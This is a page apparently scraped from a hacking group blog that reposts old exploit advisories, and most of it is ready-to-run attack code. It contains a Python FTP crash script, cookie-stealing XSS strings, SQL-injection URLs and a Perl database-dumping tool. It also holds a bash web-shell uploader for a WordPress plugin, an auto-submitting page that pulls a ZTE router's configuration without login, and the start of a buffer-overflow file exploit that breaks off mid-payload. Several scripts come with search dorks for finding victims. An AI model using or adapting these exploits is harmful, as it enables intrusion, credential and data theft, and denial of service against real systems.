source: https://www.securityfocus.com/bid/52554/info
TYPSoft FTP Server is prone to a buffer-overflow vulnerability.
An attacker can exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition.
TYPSoft FTP Server 1.1.0 is vulnerable; other versions may also be affected.
#!/usr/bin/python
import socket, sys
if len(sys.argv)!= 2:
print '\n\t[*] Usage: ./' + sys.argv[0] + ' <target host>'
sys.exit(1)
print '\n\t[*] TypesoftFTP Server 1.1 Remote DoS (APPE) by Brock Haun'
host = sys.argv[1]
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
buffer = 'A../' + '\x41' *100
print '\n\t[*] Sending crash buffer ("A../ + \x41 * 100").'
s.connect((host,21))
data = s.recv(1024)
s.send('USER anonymous' + '\r\n')
data = s.recv(1024)
s.send('PASS anonymous' + '\r\n')
data = s.recv(1024)
s.send('APPE ' + buffer + '\r\n')
print '\n\t[*] Done! Target should be unresponsive!'
s.close()
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863141321
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
source: https://www.securityfocus.com/bid/52627/info
WebGlimpse is prone to a remote command-injection vulnerability.
Attackers can exploit this issue to execute arbitrary commands in the context of the application.
WebGlimpse versions prior to 20.20.0 are affected.
query=%27%26command+and+arguments+go+here%26%27
source: https://www.securityfocus.com/bid/52622/info
Gnuboard is prone to an HTML-injection vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
Attacker-supplied HTML and script code would run in the context of the affected website, potentially allowing the attacker to steal cookie-based authentication credentials or control how the site is rendered to the user.
Gnuboard versions prior to 4.34.21 are vulnerable.
1) you can upload a file (e.g. a.txt) to the BBS.
2) you can download it from the following scripts and figure out what's working on.
### vulnerable code #########################################################################################################################
javascript:file_download('./download.php?bo_table=test&wr_id=13&no=0&sca=&sfl=&stx=&sst=&sod=&spt=0&page=0', 'a.txt');
#############################################################################################################################################
3) you can also upload a file with name of XSS code. The following is the example.
- ');alert(document.cookie);//
- %27);alert(document.cookie);%2f%2f
- %27%29%3b%61%6c%65%72%74%28%64%6f%63%75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%29%2f%2f
### vulnerable code #########################################################################################################################
javascript:file_download('./download.php?bo_table=test&wr_id=13&no=0&sca=&sfl=&stx=&sst=&sod=&spt=0&page=0', '');alert(document.cookie);//');
#############################################################################################################################################
4) The example file works by pulling in the Javascript and running it as part of the Javascript.
source: https://www.securityfocus.com/bid/52637/info
Vacation Packages is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://wwww.example.com/vacation-packages/demo.php?controller=Listings&action=search&listing_search=1&season=2'
source: https://www.securityfocus.com/bid/52646/info
WebGlimpse is prone to a path-disclosure vulnerability.
Exploiting this issue can allow an attacker to access sensitive data that may be used to launch further attacks against a vulnerable computer.
WebGlimpse 2.18.7 is vulnerable; other versions may also be affected.
http://www.example.com/wgarcmin.cgi?NEXTPAGE=D&ID=1&DOC=1
source: https://www.securityfocus.com/bid/52648/info
CreateVision CMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
#!/usr/local/bin/perl
#
# Exploit Title: CreateVision CMS Database injection.
# Description: Virtually none of the variables are not filtered.
# Google Dork: inurl:artykul_print.php
# Date: 2012/02/24
# Author : Zwierzchowski Oskar
# Software Link: http://www.createvision.pl/
# Version: All Version
# Security Risk: High
# Tested on: FreeBSD
# Greets: Grzegorz Stachowiak, Damian Blaszczyk, Borislav Kotov.
use strict;
use warnings;
use LWP::Simple;
sub main ()
{
my %config = (
'host' => '',
'columns' => ',3,4',
'column' => '',
'table' => ''
);
my %send = ();
getops(\%config);
getcolumn(\%config, \%send);
getuser(\%config, \%send);
getdatabase(\%config, \%send);
gettables(\%config, \%send);
otherdata(\%config, \%send);
return 0;
}
sub getdatabase ($$)
{
my $config = shift;
my $send = shift;
my $data;
$data = get $config->{host}.$send->{database};
analizedata($data, 'Database');
return ($config, $send);
}
sub getuser ($$)
{
my $config = shift;
my $send = shift;
my $data;
$data = get $config->{host}.$send->{user};
analizedata($data, 'User');
return ($config, $send);
}
sub gettables ($$)
{
my $config = shift;
my $send = shift;
my $data;
$data = get $config->{host}.$send->{column};
analizedata($data, 'Tables');
}
sub otherdata ($$)
{
my $config = shift;
my $send = shift;
my $data;
my $table;
my $column;
print "[+]\tIf you want to draw some data? (1 or 2)\r\n\r\n";
print "[1]\tYes\r\n";
print "[2]\tNo\r\n";
$data = <STDIN>;
chomp($data);
if ($data == 2)
{
exit 0;
}
else
{
print "[+]\tName of the table which you want to download (check the output.txt) :\r\n";
$table = <STDIN>;
chomp($table);
print "[+]\tGet column/s: (ex. column1,column2,column3)\r\n";
$column = <STDIN>;
chomp($column);
$column =~ s/,/,char(58),/g;
$send->{tables} = '/artykul_print.php?id=103+and+1=2+union+select+1,concat('.$column.')'.$config->{columns}.'+from+'.$table.'--';
$data = get $config->{host}.$send->{tables};
analizedata($data, 'MYDATA');
}
return 0;
}
sub analizedata ($$)
{
my $data = shift;
my $pref = shift;
my $table;
my $column;
my @columns = ('');
my @tables = ('');
while ($data =~ /<span class=\"tytul_artykulu\">(.*?)<\/span>/g)
{
if ($pref eq 'Tables')
{
($table, $column) = split(/:/, $1);
save($1, 'output.txt');
push(@columns, $column);
if ($table eq $tables[$#tables])
{
}
else
{
push(@tables, $table);
}
}
else
{
print "[+]\t[".$pref."][".$1."]\r\n";
save($1, 'output.txt');
}
}
if ($pref eq 'Tables')
{
print "[+]\t".$#columns." columns in ".$#tables." tables\r\n";
print "[+]\tResults has been saved into output.txt\r\n";
}
return 0;
}
sub getops ($)
{
my $config = shift;
if (!$ARGV[0] || $ARGV[0] !~ /http:\/\//)
{
print "[+]\tUsage: perl splo.pl http://host.com\r\n";
exit 0;
}
else
{
$config->{host} = $ARGV[0];
}
return $config;
}
sub getcolumn ($$)
{
my $config = shift;
my $send = shift;
my $data;
for (1..20)
{
incrcolum($config);
$send->{user} = '/artykul_print.php?id=105+and+1=2+union+select+1,user()'.$config->{columns}.'--';
$send->{database} = '/artykul_print.php?id=105+and+1=2+union+select+1,database()'.$config->{columns}.'--';
$send->{column} = '/artykul_print.php?id=105+and+1=2+union+select+1,concat(table_name,char(58),column_name)'.$config->{columns}.'+from+information_schema.columns--';
$data = get $config->{host}.$send->{user};
if (index($data, "<span class=\"tytul_artykulu\">") != -1)
{
return ($config, $send);
}
}
return $config;
}
sub incrcolum ($)
{
my $config = shift;
my @digits = split(/,/, $config->{columns});
my $data = (($digits[$#digits])+1);
$config->{columns} =~ s/$config->{columns}/$config->{columns},$data/g;
return $config;
}
sub save ($$)
{
my $data = shift;
my $file = shift;
open(FILE, ">>".$file."");
print FILE "".$data."\r\n";
close FILE;
return 0;
}
main();
#!/bin/bash
#
# Exploit Title : Wordpress N-Media Website Contact Form with File Upload 1.3.4
# Google Dork : inurl:"/uploads/contact_files/"
# Exploit Author : Claudio Viviani
# Vulnerability discovered by : Claudio Viviani
# Script Written by : F17.c0de
# Software link : https://downloads.wordpress.org/plugin/website-contact-form-with-file-upload.1.3.4.zip
# Version : 1.3.4
# Tested on : Kali Linux 1.1.0a / Curl 7.26.0
# Info: The "upload_file()" ajax function is affected from unrestircted file upload vulnerability
# Response : {"status":"uploaded","filename":"YOURSHELL"}
# Shell location http://VICTIM/wp-content/uploads/contact_files/YOURSHELL
echo '
+---------------------------------------------------------------+
| |
| Wordpress N-Media Website Contact Form with File Upload 1.3.4 |
| |
+---------------------------------------------------------------+
| |
| Script by : F17.c0de |
| Vuln Discovered by : Claudio Viviani |
| Date : 15.04.2015 |
| Google Dork : inurl:"/uploads/contact_files/" |
| Vulnerability : "upload_file()" on admin-ajax.php |
| Description : Auto shell uploader |
| |
+---------------------------------------------------------------+
| No System is Safe |
+---------------------------------------------------------------+
'
echo -n -e "Path of your shell: "
read bd
echo -n -e "Victim address [ex: http://www.victim.com]: "
read st
sleep 1
echo
echo "Uploading Shell. . ."
echo
curl -k -X POST -F "action=upload" -F "Filedata=@./$bd" -F "action=nm_webcontact_upload_file" $st/wp-admin/admin-ajax.php
echo
echo
echo "Job Finished"
echo
/*
Exploit Title : ZTE remote configuration download
Date : 09 May 2015
Exploit Author : Daniel Cisa
Vendor Homepage : http://wwwen.zte.com.cn/en/
Platform : Hardware
Tested On : ZTE F660
Firmware Version: 2.22.21P1T8S
--------------------------
Config remote download
--------------------------
ZTE F660 Embedded Software does not check Cookies And Credentials on POST
method so
attackers could download the config file with this post method without
authentication.
*/
<html>
<body onload="document.fDownload.submit();">
<form name="fDownload" method="POST" action="
http://192.168.1.1/getpage.gch?pid=101&nextpage=manager_dev_config_t.gch"
enctype="multipart/form-data" onsubmit="return false;">
Request Sent....
<input type="hidden" name="config" id="config" value="">
</body>
</html>
#!/usr/bin/python
# Exploit Title: VideoCharge Vanilla BOF Exploit v3.16.3.04
# Date: 10/May/2015
# Author: @evil_comrade IRC freenode: #vulnhub or #offsec or #corelan
# email: kwiha2003 [at] yahoo [dot] com
# Version: v3.16.3.04
# Tested on: Win XP3
# Software link:http://www.softpedia.com/get/Multimedia/Video/Encoders-Converter-DIVX-Related/Videocharge-Express.shtml#download
# Greetz: b33f,corelan,offsec,vulnhub,HUST510, packetstorm
#
# Notes: Copy the file created by the script into the videocharge folder
# Looks like the whole productline is messed. Same sploit for all versions
#
import struct
header = (
"\x3c\x3f\x78\x6d\x6c\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31"
"\x2e\x30\x22\x20\x65\x6e\x63\x6f\x64\x69\x6e\x67\x3d\x22\x57\x69"
"\x6e\x64\x6f\x77\x73\x2d\x31\x32\x35\x31\x22\x20\x3f\x3e\x3c\x4d"
"\x61\x69\x6e\x3e\x0d\x0a\x3c\x56\x45\x52\x53\x49\x4f\x4e\x20\x63"
"\x75\x72\x76\x65\x72\x3d\x22\x33\x2e\x31\x36\x2e\x34\x2e\x30\x36"
"\x22\x2f\x3e\x3c\x46\x49\x4c\x45\x53\x3e\x0d\x0a\x3c\x50\x61\x74"
"\x68\x54\x6f\x4d\x65\x64\x69\x61\x46\x69\x6c\x65\x20\x76\x61\x6c"
"\x75\x65\x3d\x27\x43\x3a\x5c\x50\x65\x61\x63\x68\x5c\x73\x61\x6d"
"\x70\x6c\x65\x5f\x6d\x70\x34\x27\x20\x74\x79\x70\x65\x3d\x27\x38"
"\x27\x3e\x0d\x0a\x3c\x54\x69\x6d\x65\x6c\x69\x6e\x65\x73\x20\x76"
"\x61\x6c\x75\x65\x3d\x27\x30\x27\x20\x74\x79\x70\x65\x3d\x27\x33"
"\x27\x3e\x0d\x0a\x3c\x2f\x54\x69\x6d\x65\x6c\x69\x6e\x65\x73\x3e"
"\x0d\x0a\x3c\x43\x75\x73\x74\x6f\x6d\x54\x68\x75\x6d\x62\x6e\x61"
"\x69\x6c\x73\x20\x65\x6e\x75\x6d\x3d\x20\x22\x54\x52\x55\x45\x22"
"\x3e\x0d\x0a\x3c\x2f\x43\x75\x73\x74\x6f\x6d\x54\x68\x75\x6d\x62"
"\x6e\x61\x69\x6c\x73\x3e\x0d\x0a\x3c\x49\x44\x58\x20\x76\x61\x6c"
"\x75\x65\x3d\x27"
)
footer = (
"\x27\x20\x74\x79\x70\x65\x3d\x27\x38\x27\x3e\x0d\x0a\x3c\x2f\x49"
"\x44\x58\x3e\x0d\x0a\x3c\x43\x75\x73\x74\x6f\x6d\x50\x61\x74\x74"
"\x65\x72\x6e\x4e\x61\x6d\x65\x20\x76\x61\x6c\x75\x65\x3d\x27\x27"
"\x20\x74\x79\x70\x65\x3d\x27\x38\x27\x3e\x0d\x0a\x3c\x46\x4f\x52"
"\x4d\x41\x54\x5f\x69\x20\x76\x61\x6c\x75\x65\x3d\x27\x25\x30\x32"
"\x64\x27\x20\x74\x79\x70\x65\x3d\x27\x38\x27\x3e\x0d\x0a\x3c\x2f"
"\x46\x4f\x52\x4d\x41\x54\x5f\x69\x3e\x0d\x0a\x3c\x46\x4f\x52\x4d"
"\x41\x54\x5f\x74\x20\x76\x61\x6c\x75\x65\x3d\x27\x25\x30\x32\x64"
"\x27\x20\x74\x79\x70\x65\x3d\x27\x38\x27\x3e\x0d\x0a\x3c\x2f\x46"
"\x4f\x52\x4d\x41\x54\x5f\x74\x3e\x0d\x0a\x3c\x46\x4f\x52\x4d\x41"
"\x54\x5f\x66\x20\x76\x61\x6c\x75\x65\x3d\x27\x25\x30\x32\x64\x27"
"\x20\x74\x79\x70\x65\x3d\x27\x38\x27\x3e\x0d\x0a\x3c\x2f\x46\x4f"
"\x52\x4d\x41\x54\x5f\x66\x3e\x0d\x0a\x3c\x46\x4f\x52\x4d\x41\x54"
"\x5f\x78\x20\x76\x61\x6c\x75\x65\x3d\x27\x25\x30\x32\x64\x27\x20"
"\x74\x79\x70\x65\x3d\x27\x38\x27\x3e\x0d\x0a\x3c\x2f\x46\x4f\x52"
"\x4d\x41\x54\x5f\x78\x3e\x0d\x0a\x3c\x46\x4f\x52\x4d\x41\x54\x5f"
"\x79\x20\x76\x61\x6c\x75\x65\x3d\x27\x25\x30\x32\x64\x27\x20\x74"
"\x79\x70\x65\x3d\x27\x38\x27\x3e\x0d\x0a\x3c\x2f\x46\x4f\x52\x4d"
"\x41\x54\x5f\x79\x3e\x0d\x0a\x3c\x46\x4f\x52\x4d\x41\x54\x5f\x72"
"\x20\x76\x61\x6c\x75\x65\x3d\x27\x25\x30\x32\x64\x27\x20\x74\x79"
"\x70\x65\x3d\x27\x38\x27\x3e\x0d\x0a\x3c\x2f\x46\x4f\x52\x4d\x41"
"\x54\x5f\x72\x3e\x0d\x0a\x3c\x46\x4f\x52\x4d\x41\x54\x5f\x67\x20"
"\x76\x61\x6c\x75\x65\x3d\x27\x25\x30\x32\x64\x27\x20\x74\x79\x70"
"\x65\x3d\x27\x38\x27\x3e\x0d\x0a\x3c\x2f\x46\x4f\x52\x4d\x41\x54"
"\x5f\x67\x3e\x0d\x0a\x3c\x46\x4f\x52\x4d\x41\x54\x5f\x63\x20\x76"
"\x61\x6c\x75\x65\x3d\x27\x25\x30\x32\x64\x27\x20\x74\x79\x70\x65"
"\x3d\x27\x38\x27\x3e\x0d\x0a\x3c\x2f\x46\x4f\x52\x4d\x41\x54\x5f"
"\x63\x3e\x0d\x0a\x3c\x52\x61\x6e\x67\x65\x5f\x63\x20\x76\x61\x6c"
"\x75\x65\x3d\x27\x32\x27\x20\x74\x79\x70\x65\x3d\x27\x33\x27\x3e"
"\x0d\x0a\x3c\x2f\x52\x61\x6e\x67\x65\x5f\x63\x3e\x0d\x0a\x3c\x2f"
"\x43\x75\x73\x74\x6f\x6d\x50\x61\x74\x74\x65\x72\x6e\x4e\x61\x6d"
"\x65\x3e\x0d\x0a\x3c\x43\x75\x73\x74\x6f\x6d\x46\x6f\x6c\x64\x65"
"\x72\x20\x76\x61\x6c\x75\x65\x3d\x27\x27\x20\x74\x79\x70\x65\x3d"
"\x27\x38\x27\x3e\x0d\x0a\x3c\x2f\x43\x75\x73\x74\x6f\x6d\x46\x6f"
"\x6c\x64\x65\x72\x3e\x0d\x0a\x3c\x53\x6b\x69\x70\x52\x61\x6e\x67"
"\x65\x45\x6e\x75\x6d\x20\x65\x6e\x75\x6d\x3d\x20\x22\x54\x52\x55"
"\x45\x22\x3e\x0d\x0a\x3c\x2f\x53\x6b\x69\x70\x52\x61\x6e\x67\x65"
"\x45\x6e\x75\x6d\x3e\x0d\x0a\x3c\x53\x70\x6c\x69\x74\x49\x74\x65"
"\x6d\x45\x6e\x75\x6d\x20\x65\x6e\x75\x6d\x3d\x20\x22\x54\x52\x55"
"\x45\x22\x3e\x0d\x0a\x3c\x2f\x53\x70\x6c\x69\x74\x49\x74\x65\x6d"
"\x45\x6e\x75\x6d\x3e\x0d\x0a\x3c\x41\x75\x64\x69\x6f\x53\x74\x72"
"\x65\x61\x6d\x20\x76\x61\x6c\x75\x65\x3d\x27\x30\x27\x20\x74\x79"
"\x70\x65\x3d\x27\x33\x27\x3e\x0d\x0a\x3c\x2f\x41\x75\x64\x69\x6f"
"\x53\x74\x72\x65\x61\x6d\x3e\x0d\x0a\x3c\x49\x6e\x63\x6c\x75\x64"
"\x65\x43\x68\x61\x70\x74\x65\x72\x20\x76\x61\x6c\x75\x65\x3d\x27"
"\x31\x27\x20\x74\x79\x70\x65\x3d\x27\x33\x27\x3e\x0d\x0a\x3c\x2f"
"\x49\x6e\x63\x6c\x75\x64\x65\x43\x68\x61\x70\x74\x65\x72\x3e\x0d"
"\x0a\x3c\x55\x73\x65\x53\x75\x62\x46\x6f\x6c\x64\x65\x72\x73\x20"
"\x76\x61\x6c\x75\x65\x3d\x27\x31\x27\x20\x74\x79\x70\x65\x3d\x27"
"\x33\x27\x3e\x0d\x0a\x3c\x2f\x55\x73\x65\x53\x75\x62\x46\x6f\x6c"
"\x64\x65\x72\x73\x3e\x0d\x0a\x3c\x2f\x50\x61\x74\x68\x54\x6f\x4d"
"\x65\x64\x69\x61\x46\x69\x6c\x65\x3e\x0d\x0a\x3c\x2f\x46\x49\x4c"
"\x45\x53\x3e\x0d\x0a\x3c\x43\x6f\x6d\x6d\x6f\x6e\x3e\x0d\x0a\x3c"
"\x4f\x75\x74\x70\x75\x74\x3e\x0d\x0a\x3c\x4d\x6f\x64\x65\x20\x76"
"\x61\x6c\x75\x65\x3d\x27\x31\x27\x20\x74\x79\x70\x65\x3d\x27\x33"
"\x27\x3e\x0d\x0a\x3c\x2f\x4d\x6f\x64\x65\x3e\x0d\x0a\x3c\x4f\x75"
"\x74\x70\x75\x74\x4d\x65\x64\x69\x61\x4e\x61\x6d\x65\x20\x76\x61"
"\x6c\x75\x65\x3d\x27\x27\x20\x74\x79\x70\x65\x3d\x27\x38\x27\x3e"
"\x0d\x0a\x3c\x2f\x4f\x75\x74\x70\x75\x74\x4d\x65\x64\x69\x61\x4e"
"\x61\x6d\x65\x3e\x0d\x0a\x3c\x44\x65\x73\x74\x69\x6e\x61\x74\x69"
"\x6f\x6e\x50\x61\x74\x68\x20\x76\x61\x6c\x75\x65\x3d\x27\x27\x20"
"\x74\x79\x70\x65\x3d\x27\x38\x27\x3e\x0d\x0a\x3c\x2f\x44\x65\x73"
"\x74\x69\x6e\x61\x74\x69\x6f\x6e\x50\x61\x74\x68\x3e\x0d\x0a\x3c"
"\x46\x69\x6c\x65\x4e\x61\x6d\x65\x50\x61\x74\x74\x65\x72\x6e\x20"
"\x76\x61\x6c\x75\x65\x3d\x27\x25\x73\x5f\x63\x6f\x70\x79\x27\x20"
"\x74\x79\x70\x65\x3d\x27\x38\x27\x3e\x0d\x0a\x3c\x46\x4f\x52\x4d"
"\x41\x54\x5f\x69\x20\x76\x61\x6c\x75\x65\x3d\x27\x25\x30\x32\x64"
"\x27\x20\x74\x79\x70\x65\x3d\x27\x38\x27\x3e\x0d\x0a\x3c\x2f\x46"
"\x4f\x52\x4d\x41\x54\x5f\x69\x3e\x0d\x0a\x3c\x46\x4f\x52\x4d\x41"
"\x54\x5f\x74\x20\x76\x61\x6c\x75\x65\x3d\x27\x25\x30\x32\x64\x27"
"\x20\x74\x79\x70\x65\x3d\x27\x38\x27\x3e\x0d\x0a\x3c\x2f\x46\x4f"
"\x52\x4d\x41\x54\x5f\x74\x3e\x0d\x0a\x3c\x46\x4f\x52\x4d\x41\x54"
"\x5f\x66\x20\x76\x61\x6c\x75\x65\x3d\x27\x25\x30\x32\x64\x27\x20"
"\x74\x79\x70\x65\x3d\x27\x38\x27\x3e\x0d\x0a\x3c\x2f\x46\x4f\x52"
"\x4d\x41\x54\x5f\x66\x3e\x0d\x0a\x3c\x46\x4f\x52\x4d\x41\x54\x5f"
"\x78\x20\x76\x61\x6c\x75\x65\x3d\x27\x25\x30\x32\x64\x27\x20\x74"
"\x79\x70\x65\x3d\x27\x38\x27\x3e\x0d\x0a\x3c\x2f\x46\x4f\x52\x4d"
"\x41\x54\x5f\x78\x3e\x0d\x0a\x3c\x46\x4f\x52\x4d\x41\x54\x5f\x79"
"\x20\x76\x61\x6c\x75\x65\x3d\x27\x25\x30\x32\x64\x27\x20\x74\x79"
"\x70\x65\x3d\x27\x38\x27\x3e\x0d\x0a\x3c\x2f\x46\x4f\x52\x4d\x41"
"\x54\x5f\x79\x3e\x0d\x0a\x3c\x46\x4f\x52\x4d\x41\x54\x5f\x72\x20"
"\x76\x61\x6c\x75\x65\x3d\x27\x25\x30\x32\x64\x27\x20\x74\x79\x70"
"\x65\x3d\x27\x38\x27\x3e\x0d\x0a\x3c\x2f\x46\x4f\x52\x4d\x41\x54"
"\x5f\x72\x3e\x0d\x0a\x3c\x46\x4f\x52\x4d\x41\x54\x5f\x67\x20\x76"
"\x61\x6c\x75\x65\x3d\x27\x25\x30\x32\x64\x27\x20\x74\x79\x70\x65"
"\x3d\x27\x38\x27\x3e\x0d\x0a\x3c\x2f\x46\x4f\x52\x4d\x41\x54\x5f"
"\x67\x3e\x0d\x0a\x3c\x46\x4f\x52\x4d\x41\x54\x5f\x63\x20\x76\x61"
"\x6c\x75\x65\x3d\x27\x25\x30\x32\x64\x27\x20\x74\x79\x70\x65\x3d"
"\x27\x38\x27\x3e\x0d\x0a\x3c\x2f\x46\x4f\x52\x4d\x41\x54\x5f\x63"
"\x3e\x0d\x0a\x3c\x52\x61\x6e\x67\x65\x5f\x63\x20\x76\x61\x6c\x75"
"\x65\x3d\x27\x32\x27\x20\x74\x79\x70\x65\x3d\x27\x33\x27\x3e\x0d"
"\x0a\x3c\x2f\x52\x61\x6e\x67\x65\x5f\x63\x3e\x0d\x0a\x3c\x2f\x46"
"\x69\x6c\x65\x4e\x61\x6d\x65\x50\x61\x74\x74\x65\x72\x6e\x3e\x0d"
"\x0a\x3c\x49\x73\x53\x70\x6c\x69\x74\x20\x76\x61\x6c\x75\x65\x3d"
"\x27\x30\x27\x20\x74\x79\x70\x65\x3d\x27\x33\x27\x3e\x0d\x0a\x3c"
"\x53\x70\x6c\x69\x74\x54\x79\x70\x65\x20\x76\x61\x6c\x75\x65\x3d"
"\x27\x30\x27\x20\x74\x79\x70\x65\x3d\x27\x33\x27\x3e\x0d\x0a\x3c"
"\x2f\x53\x70\x6c\x69\x74\x54\x79\x70\x65\x3e\x0d\x0a\x3c\x53\x70"
"\x6c\x69\x74\x4c\x65\x6e\x67\x74\x68\x20\x76\x61\x6c\x75\x65\x3d"
"\x27\x31\x30\x27\x20\x74\x79\x70\x65\x3d\x27\x33\x27\x20\x65\x78"
"\x74\x3d\x27\x31\x27\x20\x65\x78\x74\x54\x79\x70\x65\x3d\x27\x33"
"\x27\x3e\x0d\x0a\x3c\x2f\x53\x70\x6c\x69\x74\x4c\x65\x6e\x67\x74"
"\x68\x3e\x0d\x0a\x3c\x53\x70\x6c\x69\x74\x42\x79\x53\x69\x7a\x65"
"\x4d\x6f\x64\x65\x20\x76\x61\x6c\x75\x65\x3d\x27\x30\x27\x20\x74"
"\x79\x70\x65\x3d\x27\x33\x27\x3e\x0d\x0a\x3c\x2f\x53\x70\x6c\x69"
"\x74\x42\x79\x53\x69\x7a\x65\x4d\x6f\x64\x65\x3e\x0d\x0a\x3c\x53"
"\x70\x6c\x69\x74\x43\x6f\x75\x6e\x74\x50\x61\x72\x74\x73\x20\x76"
"\x61\x6c\x75\x65\x3d\x27\x32\x27\x20\x74\x79\x70\x65\x3d\x27\x33"
"\x27\x3e\x0d\x0a\x3c\x2f\x53\x70\x6c\x69\x74\x43\x6f\x75\x6e\x74"
"\x50\x61\x72\x74\x73\x3e\x0d\x0a\x3c\x53\x70\x6c\x69\x74\x4d\x61"
"\x78\x53\x69\x7a\x65\x20\x76\x61\x6c\x75\x65\x3d\x27\x36\x30\x30"
"\x27\x20\x74\x79\x70\x65\x3d\x27\x33\x27\x20\x65\x78\x74\x3d\x27"
"\x31\x27\x20\x65\x78\x74\x54\x79\x70\x65\x3d\x27\x33\x27\x3e\x0d"
"\x0a\x3c\x2f\x53\x70\x6c\x69\x74\x4d\x61\x78\x53\x69\x7a\x65\x3e"
"\x0d\x0a\x3c\x45\x78\x61\x63\x74\x6c\x79\x20\x76\x61\x6c\x75\x65"
"\x3d\x27\x30\x27\x20\x74\x79\x70\x65\x3d\x27\x33\x27\x3e\x0d\x0a"
"\x3c\x2f\x45\x78\x61\x63\x74\x6c\x79\x3e\x0d\x0a\x3c\x2f\x49\x73"
"\x53\x70\x6c\x69\x74\x3e\x0d\x0a\x3c\x4a\x6f\x69\x6e\x53\x75\x62"
"\x54\x69\x6d\x65\x4c\x69\x6e\x65\x20\x76\x61\x6c\x75\x65\x3d\x27"
"\x30\x27\x20\x74\x79\x70\x65\x3d\x27\x33\x27\x3e\x0d\x0a\x3c\x2f"
"\x4a\x6f\x69\x6e\x53\x75\x62\x54\x69\x6d\x65\x4c\x69\x6e\x65\x3e"
"\x0d\x0a\x3c\x4f\x76\x65\x72\x77\x72\x69\x74\x65\x20\x76\x61\x6c"
"\x75\x65\x3d\x27\x31\x27\x20\x74\x79\x70\x65\x3d\x27\x33\x27\x3e"
"\x0d\x0a\x3c\x2f\x4f\x76\x65\x72\x77\x72\x69\x74\x65\x3e\x0d\x0a"
"\x3c\x54\x68\x75\x6d\x62\x4f\x6e\x6c\x79\x20\x76\x61\x6c\x75\x65"
"\x3d\x27\x30\x27\x20\x74\x79\x70\x65\x3d\x27\x33\x27\x3e\x0d\x0a"
"\x3c\x2f\x54\x68\x75\x6d\x62\x4f\x6e\x6c\x79\x3e\x0d\x0a\x3c\x2f"
"\x4f\x75\x74\x70\x75\x74\x3e\x0d\x0a\x3c\x41\x63\x74\x69\x6f\x6e"
"\x3e\x0d\x0a\x3c\x54\x77\x65\x6e\x74\x79\x46\x69\x76\x65\x46\x72"
"\x61\x6d\x65\x20\x76\x61\x6c\x75\x65\x3d\x27\x30\x27\x20\x74\x79"
"\x70\x65\x3d\x27\x33\x27\x3e\x0d\x0a\x3c\x41\x63\x74\x69\x6f\x6e"
"\x52\x6f\x6f\x74\x5f\x54\x77\x65\x6e\x74\x79\x46\x69\x76\x65\x46"
"\x72\x61\x6d\x65\x3e\x0d\x0a\x3c\x54\x77\x65\x6e\x74\x79\x46\x69"
"\x76\x65\x46\x72\x61\x6d\x65\x41\x63\x74\x69\x6f\x6e\x49\x6e\x73"
"\x65\x72\x74\x45\x76\x65\x72\x79\x20\x76\x61\x6c\x75\x65\x3d\x27"
"\x32\x35\x27\x20\x74\x79\x70\x65\x3d\x27\x33\x27\x3e\x0d\x0a\x3c"
"\x2f\x54\x77\x65\x6e\x74\x79\x46\x69\x76\x65\x46\x72\x61\x6d\x65"
"\x41\x63\x74\x69\x6f\x6e\x49\x6e\x73\x65\x72\x74\x45\x76\x65\x72"
"\x79\x3e\x0d\x0a\x3c\x54\x77\x65\x6e\x74\x79\x46\x69\x76\x65\x46"
"\x72\x61\x6d\x65\x45\x6e\x75\x6d\x3e\x0d\x0a\x3c\x2f\x54\x77\x65"
"\x6e\x74\x79\x46\x69\x76\x65\x46\x72\x61\x6d\x65\x45\x6e\x75\x6d"
"\x3e\x0d\x0a\x3c\x2f\x41\x63\x74\x69\x6f\x6e\x52\x6f\x6f\x74\x5f"
"\x54\x77\x65\x6e\x74\x79\x46\x69\x76\x65\x46\x72\x61\x6d\x65\x3e"
"\x0d\x0a\x3c\x2f\x54\x77\x65\x6e\x74\x79\x46\x69\x76\x65\x46\x72"
"\x61\x6d\x65\x3e\x0d\x0a\x3c\x54\x68\x75\x6d\x62\x6e\x61\x69\x6c"
"\x73\x20\x76\x61\x6c\x75\x65\x3d\x27\x30\x27\x20\x74\x79\x70\x65"
"\x3d\x27\x33\x27\x3e\x0d\x0a\x3c\x54\x68\x75\x6d\x62\x6e\x61\x69"
"\x6c\x45\x6e\x75\x6d\x3e\x0d\x0a\x3c\x2f\x54\x68\x75\x6d\x62\x6e"
"\x61\x69\x6c\x45\x6e\x75\x6d\x3e\x0d\x0a\x3c\x2f\x54\x68\x75\x6d"
"\x62\x6e\x61\x69\x6c\x73\x3e\x0d\x0a\x3c\x2f\x41\x63\x74\x69\x6f"
"\x6e\x3e\x0d\x0a\x3c\x2f\x43\x6f\x6d\x6d\x6f\x6e\x3e\x0d\x0a\x3c"
"\x4f\x75\x74\x70\x75\x74\x46\x69\x6c\x65\x46\x6f\x72\x6d\x61\x74"
"\x20\x76\x61\x6c\x75\x65\x3d\x27\x7b\x31\x41\x44\x43\x33\x33\x42"
"\x39\x2d\x35\x39\x36\x44\x2d\x34\x33\x30\x43\x2d\x42\x35\x39\x41"
"\x2d\x36\x44\x37\x37\x41\x42\x43\x42\x35\x46\x44\x39\x7d\x27\x20"
"\x74\x79\x70\x65\x3d\x27\x37\x32\x27\x3e\x0d\x0a\x3c\x47\x49\x46"
"\x41\x3e\x0d\x0a\x3c\x4d\x61\x69\x6e\x3e\x0d\x0a\x3c\x50\x61\x6c"
"\x65\x74\x74\x65\x44\x65\x73\x63\x3e\x0d\x0a\x3c\x43\x6f\x6c\x6f"
"\x72\x73\x20\x76\x61\x6c\x75\x65\x3d\x27\x38\x27\x20\x74\x79\x70"
